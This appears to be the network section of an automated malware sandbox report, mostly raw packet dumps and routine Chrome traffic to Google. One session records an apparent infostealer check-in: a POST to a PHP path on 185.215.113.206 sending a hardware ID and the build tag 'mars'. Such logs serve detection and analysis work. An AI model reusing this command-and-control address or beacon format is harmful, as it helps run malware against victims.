Nov 11, 2024 01:16:06.868494987 CET	1236	IN	Data Raw: e7 f7 d2 44 53 9b 02 3b 7b 0e 58 f2 e4 f7 81 61 c3 bc 0c e3 81 96 b9 f1 f5 ed d9 1a a3 ea 72 bf 57 83 b3 eb ba 52 0f a3 81 1b 6b 39 43 cb 99 be f2 52 3b 01 81 46 0b 13 f6 83 b0 49 b5 31 43 bf 81 5e d9 f6 ed bc ed ee ef 02 5b 73 af 56 d9 3e ee f3 Data Ascii: DS;{XarWRk9CR;FI1C^[sV>FZo\|#=QU[r{O2!O>'UFyDj"Ro=7#{"CV+QiKP=SU*syrA+r=#^j]8
Nov 11, 2024 01:16:06.868505955 CET	1236	IN	Data Raw: a1 82 2b 01 6f 21 d9 5a fc 1e b7 1d 88 e3 09 1c 5b 0e 0d 21 e3 87 c9 2c cc 22 cb 4c b5 da d2 0e a2 ac da 00 5b ca 0c 01 ef 22 bb 00 b5 04 df 3d 7a 1a 0d 01 d3 22 0b 01 51 4e 08 a0 c2 a2 b9 59 df eb ea 4a 4c 84 9f 4e b5 21 bb 4c bb 9a be 7d 84 8b Data Ascii: +o!Z[!,"L["=z"QNYJLN!L}jKf{6qn"\|\WsLgJ}>{VO01\"b"kCOOPW#:UVdZ0R`3Jz)zKlJSI{jZWZ"Z
Nov 11, 2024 01:16:06.868518114 CET	684	IN	Data Raw: 9f 72 b9 4c d3 ea 06 c9 fb 57 f1 a6 f0 72 94 12 db f3 6a a9 cc fe 01 5f c2 77 d3 ba 81 ae 3a 24 f7 83 35 0b 81 42 7f 01 43 22 7f 18 4f 92 f1 e9 8d 32 04 4d 92 02 2b ca 03 9c 8f 8c 5b 52 0d 21 5b 11 d9 7e fb bc 76 03 e4 b2 be 2b 8f 9a 0d db fc 83 Data Ascii: rLWrj_w:$5BC"O2M+[R![~v+J_zj}{MnqYCL23Q:T.Okn~02f&J]MOj:Lfpi+#v[N3jiR[jcUVsmzv^zr
Nov 11, 2024 01:16:06.873425961 CET	1236	IN	Data Raw: 7e 62 18 3e e9 1b 94 d2 03 f5 dd 56 af fa c3 3d 65 1b e6 50 75 f0 e6 c5 4f 91 cc 30 b1 4a 7f 5a 2b 1b ef c7 85 78 d6 25 32 18 08 4b d7 c4 9e 23 82 82 bf 86 83 9b 0d 57 7b 02 7f 01 a5 02 05 eb 5a be b2 20 77 7e b9 16 55 f0 72 7f 81 ea 7a bf ef 84 Data Ascii: ~b>V=ePuO0JZ+x%2K#W{Z w~Urz<{V:=q6[K7"CMfS%+3q?&:M0QJ~WqkrZ~b"G!njRsE;Oe3R??AP e

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50065	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:16:08.288650036 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:16:09.207118988 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:16:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:16:09.209620953 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 2d 2d 0d 0a Data Ascii: ------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="build"mars------BKKFCFBKFCFBFIDGCGDH--
Nov 11, 2024 01:16:09.498178005 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:16:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.217.16.196	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:05 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:05 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:05 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-yhiqojhCIYqNf4x27_a9Rw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 00:14:05 UTC	112	IN	Data Raw: 62 36 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 61 79 67 75 6e 20 62 72 65 61 6b 20 64 61 6e 63 69 6e 67 20 6f 6c 79 6d 70 69 63 73 22 2c 22 6e 65 74 66 6c 69 78 20 6f 75 74 65 72 20 62 61 6e 6b 73 20 61 75 64 69 6f 20 69 73 73 75 65 73 22 2c 22 68 61 6e 6e 61 66 6f 72 64 73 22 2c 22 73 6e 6f 77 66 61 6c 6c 20 6c 61 73 20 76 65 67 Data Ascii: b60)]}'["",["raygun break dancing olympics","netflix outer banks audio issues","hannafords","snowfall las veg
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 61 73 22 2c 22 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 61 75 72 6f 72 61 20 66 6f 72 65 63 61 73 74 22 2c 22 61 72 63 61 6e 65 20 73 65 61 73 6f 6e 20 32 20 72 65 76 69 65 77 22 2c 22 65 64 77 61 72 64 73 20 68 65 6c 61 69 72 65 22 2c 22 67 72 6f 75 6e 64 20 72 6f 75 6e 64 20 72 65 73 74 61 75 72 61 6e 74 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c Data Ascii: as","northern lights aurora forecast","arcane season 2 review","edwards helaire","ground round restaurants"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 47 56 49 62 54 52 77 64 58 49 77 64 46 51 72 4e 54 46 56 64 46 4d 77 61 31 6b 7a 57 58 6c 6c 55 6d 70 34 52 30 74 61 5a 47 46 72 62 31 46 77 56 47 6c 6e 62 45 46 48 55 31 5a 49 51 55 46 77 57 58 52 56 4d 6b 38 35 4e 6d 4d 78 54 6b 38 72 4e 54 4a 78 57 6a 6c 33 56 53 74 7a 65 46 68 56 54 57 55 78 55 31 64 35 62 32 78 4a 55 32 39 42 61 6e 42 71 61 6e 4a 57 53 46 56 30 52 7a 41 7a 51 7a 64 35 57 54 41 34 4d 30 68 6f 65 6d 68 4a 61 48 56 71 53 32 64 56 57 55 64 45 4b 30 35 59 55 6b 39 45 4e 48 45 79 4b 33 52 4e 51 6b 4a 52 4b 7a 4e 44 61 6d 39 73 64 55 49 79 55 57 78 30 53 57 52 6a 51 55 45 7a 53 33 68 35 5a 55 38 35 57 55 49 35 62 6c 5a 6f 64 6e 4a 31 63 45 6c 73 4f 48 5a 4e 56 6a 5a 4f 51 56 70 72 53 6c 56 46 55 47 39 4d 57 6d 5a 59 5a 32 68 4a 55 32 63 30 Data Ascii: GVIbTRwdXIwdFQrNTFVdFMwa1kzWXllUmp4R0taZGFrb1FwVGlnbEFHU1ZIQUFwWXRVMk85NmMxTk8rNTJxWjl3VStzeFhVTWUxU1d5b2xJU29BanBqanJWSFV0RzAzQzd5WTA4M0hoemhJaHVqS2dVWUdEK05YUk9ENHEyK3RNQkJRKzNDam9sdUIyUWx0SWRjQUEzS3h5ZU85WUI5blZodnJ1cElsOHZNVjZOQVprSlVFUG9MWmZYZ2hJU2c0
2024-11-11 00:14:05 UTC	51	IN	Data Raw: 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: UERY","QUERY","QUERY","QUERY","ENTITY","QUERY"]}]
2024-11-11 00:14:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	172.217.16.196	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:05 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:05 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 00:14:05 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 00:14:05 UTC	25	IN	Data Raw: 31 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 7d 7d 0d 0a Data Ascii: 13)]}'{"ddljson":{}}
2024-11-11 00:14:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	172.217.16.196	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:05 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:05 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 00:14:05 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 00:14:05 UTC	336	IN	Data Raw: 32 36 39 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2692)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700295,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 Data Ascii: 1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003
2024-11-11 00:14:05 UTC	1278	IN	Data Raw: 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c Data Ascii: a\u003da.i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\
2024-11-11 00:14:05 UTC	360	IN	Data Raw: 31 36 31 0d 0a 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 